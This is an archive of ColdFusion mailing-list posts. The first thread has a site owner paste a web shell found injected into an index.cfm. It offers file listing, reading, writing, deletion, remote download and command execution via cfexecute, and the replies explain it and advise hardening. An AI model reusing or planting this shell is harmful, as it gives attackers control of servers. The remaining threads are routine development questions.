What is this code doing? Is it harmful?
My company is running CF8 on IIS. We have a website that doesn't get much use
inbetween biannual meetings. I just noticed the following code that was
inserted into one of the subfolder's index.cfm files. I'm not seeing any other
changes in any other file (yet) and the server doesn't appear to have taken a
hit, but I'm not even sure what this code is doing, how it got there, and
whether it's harmful. Next steps (other than yanking out the code, which I've
already done)???
cfif #Form.z0# is UTF-8
CFSET O= /CFTRYCFSWITCH EXPRESSION=#Form.chopper#CFCASE
VALUE=ACFSCRIPTO=OExpandpath(./)Chr(9);
for(c=65;c lt
91;c=c+1){if(DirectoryExists(Chr(c):\))O=OChr(c):;}/CFSCRIPT/CFCASECFCASE
VALUE=B
CFDIRECTORY DIRECTORY=#Form.z1# NAME=D SORT=TypeCFLOOP
Query=DCFSCRIPTO=OD.Name;If(D.Type eq Dir)O=O/;
O=OChr(9)DateFormat(D.DateLastModified,-mm-dd)TimeFormat(D.DateLastModified,
HH:MM:ss)Chr(9)D.SizeChr(9);
If(Left(Form.z1,1) eq
/){O=OD.Mode;}else{O=OD.Attributes;}O=OChr(10);/CFSCRIPT/CFLOOP/CFCASECFCASE
VALUE=C
CFFILE ACTION=Read FILE=#Form.z1# VARIABLE=O/CFCASECFCASE
VALUE=DCFFILE ACTION=Write FILE=#Form.z1# OUTPUT=#Form.z2#
CFSET O=1 //CFCASECFCASE VALUE=ECFSCRIPTFunction
DF(P){F=CreateObject(java,java.io.File).init(P);L=0;i=0;
if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not
L[i].delete()){DF(L[i].getPath());}}}F.delete();}
DF(Form.z1);O=1;/CFSCRIPT/CFCASECFCASE VALUE=Fcffile
action=readbinary file=#Form.z1# variable=B /
cfset J=CreateObject(java,java.nio.ByteBuffer) /cfset
X=J.Allocate(JavaCast( int, ArrayLen(B)+6)) /
cfset X.Put(ToBinary(ToBase64(-|)), JavaCast(int,0), 3 ) /cfset
X.Put(B, JavaCast(int,0), JavaCast(int,ArrayLen(B)) ) /
cfset X.Put(ToBinary(ToBase64(|-)), JavaCast(int,0), 3 ) /CFCONTENT
Type=application/octet-stream Variable=#X.Array()#
CFABORT/CFCASECFCASE
VALUE=GCFSCRIPTF=CreateObject(java,java.io.FileOutputStream);F.init(Form.z1);
h=0123456789ABCDEF;C=Form.z2;for(i=0;i lt
Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1;}
F.close();O=1;/CFSCRIPT/CFCASECFCASE VALUE=HCFFUNCTION
Name=cpfCFARGUMENT Name=SCFARGUMENT Name=D
CFFILE ACTION=Copy SOURCE=#S#
DESTINATION=#D#/CFFUNCTIONCFSCRIPTFunction
CP(S,D){sf=CreateObject(java,java.io.File).init(S);
df=CreateObject(java,java.io.File).init(D);L=0;i=0;if(sf.isDirectory()){if(not
df.exists()){df.mkdir();}L=sf.listFiles();
for(i=1;i lte
ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()/L[i].getName());}else{
cpf(L[i].getPath(),df.getPath()/L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O=1;/CFSCRIPT/CFCASE
CFCASE VALUE=ICFFILE ACTION=MOVE SOURCE=#Form.z1#
DESTINATION=#Form.z2#CFSET O=1 //CFCASECFCASE VALUE=J
CFDIRECTORY Directory=#Form.z1# Action=CreateCFSET O=1
//CFCASECFCASE VALUE=KCFSCRIPT
FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O=1;/CFSCRIPT/CFCASECFCASE
VALUE=LCFSCRIPTZ=Form.z2;
For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq / Or Mid(Z,i,1) eq
\){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);/CFSCRIPT
CFHTTP METHOD=Get URL=#Form.z1# PATH=#P# FILE=#F#CFSET O=1
//CFCASECFCASE VALUE=M
CFEXECUTE Name=#Mid(Form.z1,3,Len(Form.z1)-2)# Arguments=#Mid(Form.z1,1,2)#
#Form.z2# Variable=O TimeOut=60 /
/CFCASE/CFSWITCHCFCATCH Type=AnyCFSET O=ERROR:// CFCatch.Message
//CFCATCH
/CFTRYCFOUTPUT-#Chr(124)OChr(124)#-/CFOUTPUT
cfabort
cfelse
/cfif
~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive:
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353744
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: What is this code doing? Is it harmful?
Thank you all. I am going through all of the sites on that box to see if any discernible damage has been done and have already started implementing some of the steps detailed in the Lockdown Guide Dave mentioned. What a way to start off the new year. Scott From: Mallory Woods mallory.wo...@gmail.com To: cf-talk cf-talk@houseoffusion.com Sent: Thursday, January 3, 2013 2:50 PM Subject: Re: What is this code doing? Is it harmful? http://stackoverflow.com/questions/13099802/cfml-strange-script-found-in-hosting- Seems that someone has dealt with this a few months ago. On Thu, Jan 3, 2013 at 2:22 PM, Mahcsig mahc...@mahcsig.com wrote: It also has an option for cfexecute, and filesetlastmodified, so they could have covered some of their tracks that way. If CF is running as local system, they could have done some really bad things to the system... ~Mahcsig On Thu, Jan 3, 2013 at 11:05 AM, Dave Watts dwa...@figleaf.com wrote: My company is running CF8 on IIS. We have a website that doesn't get much use inbetween biannual meetings. I just noticed the following code that was inserted into one of the subfolder's index.cfm files. I'm not seeing any other changes in any other file (yet) and the server doesn't appear to have taken a hit, but I'm not even sure what this code is doing, how it got there, and whether it's harmful. Any code that can write to your server's filesystem is potentially harmful. This code appears to do that, along with listing files on your filesystem and allowing viewers to download them. Both of these things are potentially harmful, unless you explicitly want to do that. Next steps (other than yanking out the code, which I've already done)??? Why is CF allowed to write to the web root? If you prevent CF from writing files where it generally shouldn't, you can prevent a lot of these types of vulnerabilities. Preventing this may involve changing CF's login from SYSTEM to a non-privileged user in addition to setting filesystem permissions. I would recommend that you read the excellent CF 9 Lockdown Guide, which I think is still on the Adobe site. Then, do the things it says to do. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353749 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
CFFILE in CFWINDOW
In CF8, I'm trying to upload multiple files via a CFFORM in a CFWINDOW. I've googled enough to know it can't be done with just good ol' ColdFusion since the file upload fields aren't being passed along in the form. I've looked at uploadify and some other AJAX solutions, but I don't need anything too crazy/complex. I need to stay within the window, as well as perform some validation and database inserts. I am comfortable with jQuery and AJAX, but am certainly no expert. What would be my best bet? Tha ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:347446 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Adobe Solution?
I apologize in advance since this isn't a CF question, but I'm desperate and hoping this is at least an Adobe question. A client of mine wants to create a form for users to fill out electronically. He then wants to take their responses (attached via email) and upload the data to an Access 2007 database. He absolutely does not want this to be web-based. He ideally wanted me to create an interactive form in PDF. I thought, Sure, no problem. The problems I'm running into? Importing PDF data into Access appears to involve an extra step (converting the PDF to text or XML or Excel) which he/the client would have to do (since he's the one getting the returned forms). Worse is that he wants some multi-select drop-down lists in the form and I'm not seeing a way to do this in a PDF (I've played around with both Acrobat Pro and LiveCycle Designer). And without VBA skills I don't have, I'm not even seeing how to do this in an Excel or Word form. I'm getting stuck and turn to you kind sirs for your advice. How would you do this? Tha ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:346213 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Adobe Solution?
Yes, this is what I'm trying to accomplish. My client wants a PDF (or Excel or Word) form that he can send to people, have them fill out, and email back to him. He then wants to be able to import that data into an Access database without having to retype anything into an Access form. Eventually, he'll want reports to decipher the data. I was hoping to avoid a lot of VB since I'm not too familiar with it. There will be a lot of PDF forms, though, to justify getting to know it. I guess. After hours and hours of research, though, I still don't even know if this is possible. Unfortunately, all of the other solutions won't work since this can't be web-based. This is a government client and I can't just put the form anywhere I want on the web. And it's too late at this point to try to find a place on one of their servers since that involves a lot of red tape. Time is not on our side. So, nothing web-based. I really wish this could all be done on the web with a SQL Server backend, but my hands are tied. So, he wants the people to fill out a PDF form and email the form to him. Then he wants to be able to scrape the form field data off and into Access DB. Does that sound like the issue? There probably is a better solution using Visual Basic. You might be able to write something in VB to use an Acrobat component to read the PDF and fish out the form data and put it in the database table for each PDF. You might even be able to do this in batch form. There would need to be a lot of PDF forms to make it worth doing though. There is a reason that web/database work i ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:346220 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Report Builder
The users aren't going to be too technically proficient. Just your average group of users. I think Report Builder is going to make their heads explode. I was hoping for something user-friendly that would allow them to customize what data appears in a report and where (allow them to change the layout somewhat). Should I simply be thinking of making my own AJAXy kind of front-end? Thanks, Scott --- On Wed, 11/3/10, Dave Watts dwa...@figleaf.com wrote: It really depends on two things. First, how technically proficient are these users? Do they have experience using banded report generators? Second, do you want to allow them the level of access to the server needed to generate reports with Report Builder? ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:338832 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Report Builder
I want to give the users of my CF 8 site the ability to dynamically generate reports. I've never used Report Builder before. Will non-technical users be able to use this, or will something else be better suited for them? Thanks, Scott ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:338800 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Creating a custom workflow process
I need to give the admin users of a website I'm developing the ability to create a custom workflow. They would need to be able to name the first step in the process and then specify if this is true/yes, go here and if no, go here. Then, when someone is working on something in the workflow, they want to be able to graphically display a you are here sort of diagram. Has anyone done something similar? I can sort of picture the database structure, but I can't wrap my head around the image short of creating a separate image for each step in the process. Which defeats the purpose of having this all be customizable/dynamic. Thanks, Scott ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology-Michael-Dinowitz/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:337231 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Creating a custom workflow process
Yes. Let's say this is a proposal bidding process. One company might need the ability to enter three steps in their proposal process. Another company might have 20 steps. I want them to have as many or as few steps as they need. An example process could be: Does the proposal fit our strategic decision? Yes - Do we have a strong client relationship? Yes - Do we have a competitive edge? No - Can we improve it? No - Should we proceed? Yes - Do we have a strong client relationship? No - end of process And so on. I'm trying to build a dynamic decision tree. I'm also then wanting to show people where they are in this tree. Is there a way to graphi ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology-Michael-Dinowitz/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:337234 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
IE 8 messing up my tables in a CFWINDOW
I'm using ColdFusion.Window.create() in a link to open another window. In the pop-up window (yes, I know it's technically a div and not a pop-up window), I have a table. The contents of this pop-up window display just fine in IE 7 and Firefox 3, but not IE 8. In IE 8, everything before and after the table appears in the browser. Everything between the table tags, though, is ignored. Why? It's a very simple table. And even when I pare the code down to just tabletrtdHello World!/td/tr/table, I still can't get the text to appear. Why is IE 8 messing this up? Thanks, Scott ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:325347 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: IE 8 messing up my tables in a CFWINDOW
I must confess -- I didn't even know about that mode. Yes, the problem goes away when I turn on Compatibility View. When Compatibility View is checked, I can see the text/data in the table just fine. When I uncheck Compatibility View, I'm back to a blank screen. --- On Tue, 8/11/09, Mike Chabot mcha...@gmail.com wrote: Does the problem go away when you switch to MSIE 7 compatibility mode within MSIE 8? -Mike Chabot On Tue, Aug 11, 2009 at 2:41 PM, Scott Spurlockspurlock.sc...@yahoo.com wrote: I'm using ColdFusion.Window.create() in a link to open another window. In the pop-up window (yes, I know it's technically a div and not a pop-up window), I have a table. The contents of this pop-up window display just fine in IE 7 and Firefox 3, but not IE 8. In IE 8, everything before and after the table appears in the browser. Everything between the table tags, though, is ignored. Why? It's a very simple table. And even when I pare the code down to just tabletrtdHello World!/td/tr/table, I still can't get the text to appear. Why is IE 8 messing this up? Thanks, Scott ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:325352 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: IE 8 messing up my tables in a CFWINDOW
Geez, that was it?!? Brilliant! Problem solved! It's now working in all browsers. Thank you! Scott ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:325355 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
More cfwindow problems
I'm pretty new to this whole AJAX thing, so please bear with me. I had tried to implement some cfwindow functionality in the past and didn't find it flexible enough for my needs. So I've been trying to learn jQuery. I've got one plugin working and now I'm trying to use the Star Rating widget (http://orkan.jaslo4u.pl/star_rating/index.html#overview) in a form in a cfwindow. And that's where the lightbulb's not going on. Should the jQuery code be on the original page or in the cfwindow? I know I need the cfajaximport tag on the original page -- do I need it in the cfwindow code too? I can get the window to open up, but I can't get the jQuery code to run. Should I just ditch this cfwindow stuff altogether??? Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:315610 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
passing from form to form
I have a cfdiv with a cfform inside of it. I can submit from the first cfform to a second cfform no problem. But when I submit from the second cfform to a third cfform, I break out of the cfdiv. Why? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:314566 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: passing from form to form
Second form is a cfform as well. With all cfforms, I have the form submit back to itself, do some processing, and then cflocation to the next cfform. The first cfform submits just fine to the second cfform. The second cfform processes just fine and submits to the third cfform, but it breaks it out of the cfdiv. Even if I replace the third cfform with hello and nothing else, I just get hello on the screen. From: Azadi Saryev [EMAIL PROTECTED] To: cf-talk cf-talk@houseoffusion.com Sent: Wednesday, October 29, 2008 3:53:41 PM Subject: Re: passing from form to form hmm... is your second form a CFFORM as well or a regular FORM tag? Azadi Saryev Sabai-dee.com http://www.sabai-dee.com/ Scott Spurlock wrote: I have a cfdiv with a cfform inside of it. I can submit from the first cfform to a second cfform no problem. But when I submit from the second cfform to a third cfform, I break out of the cfdiv. Why? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:314568 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Passing info from CFWINDOW to CFDIV
I have a page with a CFDIV. In the CFDIV is a CFFORM. In the CFFORM, I have a link that when clicked opens up a CFWINDOW where the user answers a few more questions. How do I pass the data obtained in the CFWINDOW back to the original page? I want the form in the CFDIV to continue to display after the CFWINDOW closes and I also ideally want the data that was just passed into the form to now appear. Is this possible? Thanks, Scott __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:314097 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Scrollbars in CFWINDOW
Hello there. I'm using the following to create a CFWINDOW:
onClick=javascript:ColdFusion.Window.create('productDetails','Product
Details','details.cfm?ProductID=#ProductID#', {x:150, y:25, resizable:true,
height:600, width:900, draggable:true});
Works great in IE except for the fact that the scrollbars aren't automatically
appearing. I have to resize the window for them to appear. How do I get them
to automatically appear? Increasing the height of the window won't help.
There's just too much stuff on the page.
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:313015
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe:
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
